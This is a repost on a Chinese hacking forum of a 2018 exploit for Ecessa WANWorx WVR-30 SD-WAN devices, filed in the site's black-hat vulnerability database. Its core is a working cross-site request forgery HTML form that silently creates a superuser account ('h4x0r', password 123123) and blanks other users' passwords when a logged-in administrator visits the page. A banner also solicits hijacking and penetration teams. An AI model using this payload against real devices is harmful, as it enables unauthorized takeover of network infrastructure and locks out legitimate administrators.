跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit title: Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)
# Date: 2018-05-21
# Author: LiquidWorm
# Vendor: Ecessa Corporation
# Product web page: https://www.ecessa.com
# Affected version: 10.7.4, 10.6.9, 10.7.4, 10.6.5.2, 10.5.4, 10.2.24, 9.2.24

# Summary: Ecessa's WANworX SD-WAN solutions increase network performance and
# reliability by leveraging any connection. That can be premium priced MPLS,
# lower cost broadband, or cellular 4G or LTE. Many of today’s WAN deployments
# are based on older technology that was acceptable when businesses did not run
# at breakneck speed or when operations didn’t grind to a halt when connectivity
# was disrupted. In today’s cloud-based applications, datacenters and distributed
# networks, where so much is virtualized and delivered as–a-service, limited
# bandwidth and network outages don’t just slow productivity, they stop it.

# Desc: The application interface allows users to perform certain actions via
# HTTP requests without performing any validity checks to verify the requests.
# This can be exploited to perform certain actions with administrative privileges
# if a logged-in user visits a malicious web site.

<html>
  <body>
    <form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="user_username1" value="root" />
      <input type="hidden" name="user_enabled1" value="on" />
      <input type="hidden" name="user_passwd1" value="" />
      <input type="hidden" name="user_passwd_verify1" value="" />
      <input type="hidden" name="user_delete1" value="" />
      <input type="hidden" name="user_username2" value="admin" />
      <input type="hidden" name="user_passwd2" value="" />
      <input type="hidden" name="user_passwd_verify2" value="" />
      <input type="hidden" name="user_delete2" value="" />
      <input type="hidden" name="user_username3" value="user" />
      <input type="hidden" name="user_enabled3" value="on" />
      <input type="hidden" name="user_passwd3" value="" />
      <input type="hidden" name="user_passwd_verify3" value="" />
      <input type="hidden" name="user_delete3" value="" />
      <input type="hidden" name="user_username4" value="h4x0r" />
      <input type="hidden" name="user_enabled4" value="on" />
      <input type="hidden" name="user_superuser4" value="on" />
      <input type="hidden" name="user_passwd4" value="123123" />
      <input type="hidden" name="user_passwd_verify4" value="123123" />
      <input type="hidden" name="users_num" value="4" />
      <input type="hidden" name="page" value="util_configlogin" />
      <input type="hidden" name="val_requested_page" value="user_accounts" />
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="page_uuid" value="73f90fa3-2e60-4fd7-a792-1ff6c7513d92" />
      <input type="hidden" name="form_has_changed" value="1" />
      <input type="submit" value="Supersize!" />
    </form>
  </body>
</html>

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。